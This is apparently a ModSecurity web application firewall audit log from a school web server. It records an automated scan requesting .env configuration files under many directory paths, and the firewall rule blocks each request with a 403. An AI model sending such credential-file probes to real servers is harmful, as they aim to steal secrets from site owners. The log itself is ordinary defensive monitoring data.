Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a39cb55f-Z--
--864ddc30-A--
[23/Apr/2025:23:13:21 +0700] aAkRoT1ahuoJLEjKiAU05QAAAII 103.236.140.4 38022 103.236.140.4 8181
--864ddc30-B--
GET /app/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--864ddc30-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--864ddc30-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424801387951 861 (- - -)
Stopwatch2: 1745424801387951 861; combined=325, p1=287, p2=0, p3=0, p4=0, p5=38, sr=90, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--864ddc30-Z--
--1d19c751-A--
[23/Apr/2025:23:13:21 +0700] aAkRodIw_rqnm4P5_afOIwAAAFE 103.236.140.4 38032 103.236.140.4 8181
--1d19c751-B--
GET /backend/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--1d19c751-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1d19c751-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424801581101 717 (- - -)
Stopwatch2: 1745424801581101 717; combined=267, p1=235, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1d19c751-Z--
--7e13607e-A--
[23/Apr/2025:23:13:21 +0700] aAkRoRuwXEWV6ydgl52X0gAAAAs 103.236.140.4 38034 103.236.140.4 8181
--7e13607e-B--
GET /api/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--7e13607e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7e13607e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424801774460 822 (- - -)
Stopwatch2: 1745424801774460 822; combined=310, p1=271, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7e13607e-Z--
--1206fb71-A--
[23/Apr/2025:23:13:21 +0700] aAkRoRuwXEWV6ydgl52X1AAAAAM 103.236.140.4 38040 103.236.140.4 8181
--1206fb71-B--
GET /code/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--1206fb71-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1206fb71-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424801968429 833 (- - -)
Stopwatch2: 1745424801968429 833; combined=305, p1=271, p2=0, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1206fb71-Z--
--b831c243-A--
[23/Apr/2025:23:13:22 +0700] aAkRoj1ahuoJLEjKiAU05wAAAIQ 103.236.140.4 38046 103.236.140.4 8181
--b831c243-B--
GET /db/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--b831c243-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b831c243-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424802163200 815 (- - -)
Stopwatch2: 1745424802163200 815; combined=297, p1=262, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b831c243-Z--
--26fcfe25-A--
[23/Apr/2025:23:13:22 +0700] aAkRohuwXEWV6ydgl52X1gAAABM 103.236.140.4 38052 103.236.140.4 8181
--26fcfe25-B--
GET /login/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--26fcfe25-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--26fcfe25-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424802357076 832 (- - -)
Stopwatch2: 1745424802357076 832; combined=346, p1=284, p2=0, p3=0, p4=0, p5=62, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--26fcfe25-Z--
--daf8f647-A--
[23/Apr/2025:23:13:22 +0700] aAkRotIw_rqnm4P5_afOJQAAAEA 103.236.140.4 38058 103.236.140.4 8181
--daf8f647-B--
GET /api_v1/go/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--daf8f647-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--daf8f647-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424802551230 700 (- - -)
Stopwatch2: 1745424802551230 700; combined=253, p1=224, p2=0, p3=0, p4=0, p5=29, sr=61, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--daf8f647-Z--
--7bbb597b-A--
[23/Apr/2025:23:13:22 +0700] aAkRojI97BrbgvDq16RsSQAAAM4 103.236.140.4 38068 103.236.140.4 8181
--7bbb597b-B--
GET /api_v1/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--7bbb597b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7bbb597b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424802747608 729 (- - -)
Stopwatch2: 1745424802747608 729; combined=268, p1=239, p2=0, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7bbb597b-Z--
--b09c2c64-A--
[23/Apr/2025:23:13:22 +0700] aAkRojI97BrbgvDq16RsSgAAANA 103.236.140.4 38074 103.236.140.4 8181
--b09c2c64-B--
GET /api_v2/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--b09c2c64-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b09c2c64-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424802940935 918 (- - -)
Stopwatch2: 1745424802940935 918; combined=356, p1=319, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b09c2c64-Z--
--f99e0112-A--
[23/Apr/2025:23:13:23 +0700] aAkRozI97BrbgvDq16RsSwAAAMU 103.236.140.4 38076 103.236.140.4 8181
--f99e0112-B--
GET /api_v2/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--f99e0112-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f99e0112-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424803136409 755 (- - -)
Stopwatch2: 1745424803136409 755; combined=278, p1=244, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f99e0112-Z--
--7357b471-A--
[23/Apr/2025:23:13:23 +0700] aAkRoxuwXEWV6ydgl52X3AAAAA8 103.236.140.4 38088 103.236.140.4 8181
--7357b471-B--
GET /v2/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--7357b471-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7357b471-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424803525294 837 (- - -)
Stopwatch2: 1745424803525294 837; combined=299, p1=266, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7357b471-Z--
--4304d66a-A--
[23/Apr/2025:23:13:23 +0700] aAkRoxuwXEWV6ydgl52X4AAAAA4 103.236.140.4 38104 103.236.140.4 8181
--4304d66a-B--
GET /v1/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--4304d66a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4304d66a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424803919223 826 (- - -)
Stopwatch2: 1745424803919223 826; combined=298, p1=264, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4304d66a-Z--
--9fea5f00-A--
[23/Apr/2025:23:13:24 +0700] aAkRpNIw_rqnm4P5_afOJgAAAEo 103.236.140.4 38110 103.236.140.4 8181
--9fea5f00-B--
GET /admin/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--9fea5f00-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9fea5f00-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424804113723 879 (- - -)
Stopwatch2: 1745424804113723 879; combined=319, p1=284, p2=0, p3=0, p4=0, p5=34, sr=115, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9fea5f00-Z--
--f1bfdd08-A--
[23/Apr/2025:23:13:24 +0700] aAkRpBuwXEWV6ydgl52X4gAAAAU 103.236.140.4 38112 103.236.140.4 8181
--f1bfdd08-B--
GET /laravel/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--f1bfdd08-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f1bfdd08-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424804307515 758 (- - -)
Stopwatch2: 1745424804307515 758; combined=315, p1=285, p2=0, p3=0, p4=0, p5=30, sr=112, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f1bfdd08-Z--
--15f3dc67-A--
[23/Apr/2025:23:13:24 +0700] aAkRpNIw_rqnm4P5_afOJwAAAEg 103.236.140.4 38122 103.236.140.4 8181
--15f3dc67-B--
GET /ci4/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--15f3dc67-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--15f3dc67-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424804500888 873 (- - -)
Stopwatch2: 1745424804500888 873; combined=279, p1=240, p2=0, p3=0, p4=0, p5=39, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--15f3dc67-Z--
--ad9c4b01-A--
[23/Apr/2025:23:13:24 +0700] aAkRpBuwXEWV6ydgl52X5gAAABY 103.236.140.4 38132 103.236.140.4 8181
--ad9c4b01-B--
GET /backup/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--ad9c4b01-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ad9c4b01-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424804694320 858 (- - -)
Stopwatch2: 1745424804694320 858; combined=326, p1=294, p2=0, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ad9c4b01-Z--
--dd64ae12-A--
[23/Apr/2025:23:13:24 +0700] aAkRpBuwXEWV6ydgl52X6AAAAAY 103.236.140.4 38138 103.236.140.4 8181
--dd64ae12-B--
GET /frontend/.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--dd64ae12-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dd64ae12-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745424804888935 837 (- - -)
Stopwatch2: 1745424804888935 837; combined=315, p1=279, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dd64ae12-Z--
--33d47417-A--
